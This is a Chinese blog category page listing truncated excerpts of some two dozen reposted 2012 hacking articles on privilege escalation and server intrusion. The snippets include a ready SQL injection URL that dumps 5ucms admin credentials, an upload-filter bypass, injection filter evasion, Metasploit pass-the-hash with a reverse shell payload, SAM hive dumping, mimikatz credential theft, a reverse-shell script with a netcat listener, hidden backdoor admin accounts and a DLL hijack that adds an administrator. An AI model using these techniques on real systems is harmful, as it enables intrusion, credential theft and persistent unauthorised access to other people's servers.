提权
fengling132
这个作者很懒,什么都没留下…
展开
-
Linux下WEBSHELL提权
用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提:1、目标机上安装了GCC能编译源码 2、Kernel 2.6.x (>= 2.6.13 && 因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把转载 2012-03-30 10:20:31 · 2357 阅读 · 0 评论 -
Mysql UDF提权
2011-08-17 1:14今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。测试经典的UDF.dll提权一次性成功。dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。转载 2012-05-19 14:02:06 · 2092 阅读 · 0 评论 -
CMD 下开3389命令 2000 2003/XP 适用于只得到CMD的条件下入侵
一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:echo Windows Registry Editor Version 5.00 >3389.regecho. >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\n转载 2012-06-13 09:52:09 · 3853 阅读 · 0 评论 -
最全的Webshell提权方法总结
在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用。WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序转载 2012-06-15 00:52:04 · 1113 阅读 · 0 评论 -
如何解决远程连接“终端服务器超出了最大允许连接数”
1、找到一台能连上网络的windows2003的机器2、开始–运行–输入“tsmmc.msc”,跳出一个远程桌面控制台3、右键点击左边的“远程桌面”,选择“新建远程桌面”,按照要求填写要连接的虚拟主机的ip、用户名、密码、域名,然后点击“确定”4、点击新建好的远程桌面,就可以登陆到远程虚拟主机了扫尾工作:1、登陆到远程虚拟主机后,打开“任务管理器”,选择“用转载 2012-06-15 00:37:38 · 893 阅读 · 0 评论 -
总结常见网站服务器提权20种思路
1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限)2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接)3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解)4,SAM提权(SAM系统帐户,通常需要下载临时存放的SAM文件,然后进行HASH破解)5,NC提转载 2012-07-01 00:06:54 · 2292 阅读 · 0 评论 -
mssql脱库脚本aspx版本
protected void Button1_Click(object sender, EventArgs e){string serverIP=txtServerIP.Text;string database=txtDatabase.Text;string user=txtUser.Text;string pass=txtPass.Text;string tableNam转载 2012-07-13 15:59:17 · 1604 阅读 · 0 评论 -
织梦cms v6.7最新上传漏洞
file:newname:提交1,必须登陆用户。2,将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。3,newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。转载 2012-07-02 15:15:57 · 790 阅读 · 0 评论 -
5ucms 最新版 sql 注入漏洞
漏洞EXP↓ /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。转载 2012-07-02 15:21:15 · 698 阅读 · 0 评论 -
渗透内网方法之巧用代理
代理在入侵里的作用—–妙用代理,渗透内网 一、踩点 主机: http://www.webshell.cc OS:Windows 2000 + IIS 5.0 + MSSQL 端口:80 21i 数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网. 首页存在注入漏洞,sa登陆. 注入点: ht转载 2012-07-03 12:51:56 · 757 阅读 · 0 评论 -
webshell迅雷提权
F4技术小组 www.f4ms.netwebshell地址http://192.168.197.130/dama.asp迅雷默认安装文件夹盘符\Program Files\Thunder Network\Thunder盘符\Program Files\Thunder要修改的两个文件进入Program文件夹getAllurl.htm转载 2012-07-21 18:46:44 · 1063 阅读 · 0 评论 -
另类提权 虚拟机还原备份文件抓hash
猪三哥那看到的,再次验证渗透玩的是思路,学习下 一頭豬,搞到WEBSHELL~補丁很全,無神馬缺陷,裝了個微軟FTP,SQL2005,常規辦法無法提權,~一看D盤有一個前天的系統BKF文件~啊哦~COPY 到WEB 目錄下回來~裝個虛擬豬還原BKF文件~稍等片刻之後,虛擬豬就變成目標豬的系統了~無密碼登入呢~插入WINPE光盤~替換sethc.exe ,重啟,按5次shift转载 2012-05-10 14:50:57 · 780 阅读 · 0 评论 -
@批处理大爆菊 记一次 win 2008 & iis 7.5 旁注入侵
好久就想写了,今天有点时间,就把以前 的笔记整理一下 主要是针对shell 有 net work 权限 可以跨目录写入文件 但是不能浏览 找不到目标站的绝对路径的 一个技巧!呵呵 找到用户名和绝对路径的关系 一个简单的批处理即可把VirtualHost几百个网站(一般是 180)全部写入一句话 比较猥琐吧 话说用这个来批量拿s转载 2012-05-08 15:41:21 · 1765 阅读 · 0 评论 -
linux webshell下信息收集和一些提权常用的命令
cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表.ifconfig {eth0 etc} – 查看网卡信息.ps aux – 查看运行进程.gcc in_file -o out_file – 编译c文件.cat /etc/passwd – 查看系统账号.sudo – 普通用户运行root权限的命令,前提是 /etc转载 2012-03-31 13:36:29 · 1055 阅读 · 0 评论 -
linux溢出提权(适合刚学习linux提权的朋友)
本帖最后由 wjs 于 2010-4-3 14:26 编辑 作者wjsqq 825680101我也是刚接触linux,谢谢师傅sunwear的指导。先在网站目录上传1.pl,是个反弹脚本Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0然后执行 ./1.pl 本机IP 1224然后本机监听nc -vv -l -p转载 2012-03-31 13:06:19 · 2449 阅读 · 0 评论 -
千博企业网站管理系统HitCount.Asp页面注入漏洞
程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-codeIf EnableStopInjection = True ThenDim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstrFy_In = "’|;|and|exec|insert|select|delete|update|c转载 2012-05-02 12:07:15 · 1285 阅读 · 0 评论 -
php168新版后台模板拿shell 技巧
摘要:php168新版后台模板拿shell技巧 ,PHP类漏洞,安全周边,溜客安全信息网 ...文章作者:Just4u本人一向没什么技术文章,只是一个技巧,欢迎各位补充指点刚刚看了黑影小子渗透cmd5的文章,说后台模板那块和谐了eval我刚刚在官网下载了php168的系统本地搭建起来.主要看了一下后台模板那里我们新建一个页面试试转载 2012-05-02 12:06:19 · 1881 阅读 · 0 评论 -
利用for命令提权
for /r d:\wwwroot\web\webshell.cc\ %i in (*.asp) do @echo %i >>c:\windows\temp\1.txt是把d:\wwwroot\web\目录下所有asp文件列出来 ,然后保存在c:\windows\temp\下的1.txt ==========================华丽的分割线===========转载 2012-05-02 14:57:50 · 572 阅读 · 0 评论 -
导出系统注册表抓Hash的思路整理
首先使用 administrator权限登录,然后使用 reg来保存注册表中 HKLM下的 SECURITY,SAM,SYSTEM,注意这里必须使用 reg的 save选项,export选项是不行的,reg save hklm\sam sam.hive reg save hklm\system ystem.hive reg save hklm\security security.hiv转载 2012-05-02 15:05:17 · 3106 阅读 · 0 评论 -
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替 2. or 用||代替 3.union select from 变成 /*!union*/这种。 一个例子: http://www.webshell.cc/ select 1 /*!union*/ select 2 from adad where 1&&1转载 2012-05-02 15:27:08 · 570 阅读 · 0 评论 -
Metasploit使用hash直接登录系统
抓到管理员的密码hash根本不用破解,直接就可以登录。12345678910111213use windows/smb/psexec set SMBUser username set SMBPass 用户密码的hash值 set payload Windows/meterpreter/reverse_tcp set rh转载 2012-05-08 16:25:33 · 1297 阅读 · 0 评论 -
介绍一下神器mimikatz,从lsass里抓密码
昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。咪咪卡住的下载地址:http://blog.gentilkiwi.com/mimikatzmimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取转载 2012-05-08 16:52:22 · 3145 阅读 · 0 评论 -
CMD下开启3389服务
rom:网络CMD下开启3389服务可能很多朋友拿下SHELL之后不能开对方的3389苦恼吧 呵呵今天我就给大家介绍比较可行的方法1、2000系统简要说一下如何进行DNS溢出攻击。我用的溢出利用程序是dns.exe,在CMD下运行它可以看到它的使用参数等信息。执行"dns -s IP"命令检测目标IP是否存在DNS溢出漏洞,如图1。在图中我们可以转载 2012-05-02 15:25:15 · 969 阅读 · 0 评论 -
文件上传字符截断与NC提交技巧
在得到网站后台的账号密码很多网站后台上传文件之后自动重名名。这里给大家提供一种老方法了。上传文件一般是upload.asp,upfile.asp,一般可以定义文件路径,也就是uppath,而一般程序会判定后缀的,比如限定不能等于asp,aspx,asa,那么可以传cdx、cer或php(服务器支持),或者判定只能是.jpg,.gif,那么就必须使用截断方式来处理了,这儿详细说明一下转载 2012-04-20 21:56:35 · 477 阅读 · 0 评论 -
入侵肉鸡,手动建立后门超级隐藏账户的方法
1.首先利用系统用户建立一个管理员用户2.利用1$用户远程登录服务器3.利用注册表建立超级隐藏用户1$,并删除自身用户4.利用1$登录服务器,结果显示administrator。5.注册表的权限取消administrators6.任务管理器,注销1$.7.删除C:\Documents and Set原创 2012-05-09 18:48:42 · 2474 阅读 · 0 评论 -
usp10.dll|lpk.dll提权工具
将此DLL文件放入服务器存在EXE的目录中,重启后(可以攻击导致重启,其他方法也行,就是让系统再次运行此目录的任何一个EXE就行)比如放在c:\php\目录下,下次重启后就会在服务器中添加用户bmd,密码为cunzhang的管理员帐号(网上已经存在了,不过没有测试成功,此款测试成功,大家可以自己测试附件压缩包为测试用的EXE,点击TEST.EXE,然后关闭就会添加用户BMD,也可以在同目录转载 2012-08-01 16:26:47 · 1905 阅读 · 0 评论